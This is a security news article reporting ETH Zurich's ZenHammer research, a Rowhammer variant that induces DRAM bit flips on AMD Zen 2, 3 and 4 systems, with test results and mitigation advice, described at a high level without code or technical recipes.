New ZenHammer Memory Attack Exposes Vulnerabilities in AMD Zen CPUs

In a recent development, academic researchers at ETH Zurich have unveiled ZenHammer, a variant of the notorious Rowhammer DRAM attack specifically tailored to target CPUs based on AMD's Zen microarchitecture. This revelation shakes the prior assumption that AMD Zen chips, particularly when paired with DDR5 RAM modules, were less susceptible to Rowhammer attacks.

Rowhammer, a well-documented exploit, capitalizes on a physical quirk of modern Dynamic Random-Access Memory (DRAM), where repeated access to specific rows of memory cells induces unintended bit flips, thus altering stored data. While previous demonstrations primarily focused on Intel and ARM CPUs, the ZenHammer attack marks the first significant incursion into the realm of AMD Zen architecture.

The complexity of AMD's DRAM addressing schemes, coupled with synchronization challenges with refresh commands, had hitherto deterred extensive exploration into Rowhammer vulnerabilities on AMD platforms. However, the researchers at ETH Zurich navigated these hurdles by reverse-engineering AMD's intricate DRAM addressing functions and devising novel synchronization techniques to time their attacks with DRAM's refresh commands effectively.

One critical aspect of their approach was optimizing memory access patterns to boost row activation rates, a pivotal factor for the success of Rowhammer attacks. Despite the inherent difficulties, the researchers managed to induce bit flips on DDR4 devices across AMD Zen 2 (Ryzen 5 3600X) and Zen 3 platforms (Ryzen 5 5600G). Notably, they achieved success in 7 out of 10 tests on DDR4/AMD Zen 2 platforms and 6 out of 10 tests on DDR4/AMD Zen 3 platforms.

Moreover, the researchers extended their investigation to DDR5 chips on AMD's Zen 4 microarchitectural platform. While DDR5 was anticipated to provide better resistance against Rowhammer attacks due to improved mitigations and higher refresh rates, the researchers found that only one out of 10 test systems, a Ryzen 7 7700X, was susceptible to the ZenHammer attack. This indicates that changes in DDR5, including enhanced Rowhammer mitigations and on-die error correction code (ECC), indeed make it more challenging to trigger bit flips.

The implications of ZenHammer extend beyond theoretical concerns, as the researchers successfully simulated attacks targeting system security, including unauthorized memory access by manipulating page table entries. In a particularly alarming demonstration, they were able to obtain root privileges on a Zen 3 test system within an average time of 93 seconds, following the discovery of an exploitable bit flip.

For AMD CPU users, defense against this emerging threat largely relies on applying software patches and firmware updates. Additionally, consideration of hardware implementing specific mitigations against Rowhammer is advisable. However, it's crucial to note that executing these attacks demands a profound understanding of both software and hardware components, underscoring the complexity and sophistication of this threat landscape.

As the boundaries between hardware and software vulnerabilities continue to blur, collaborative efforts between academia, industry, and cybersecurity practitioners become imperative to fortify digital ecosystems against evolving threats like ZenHammer.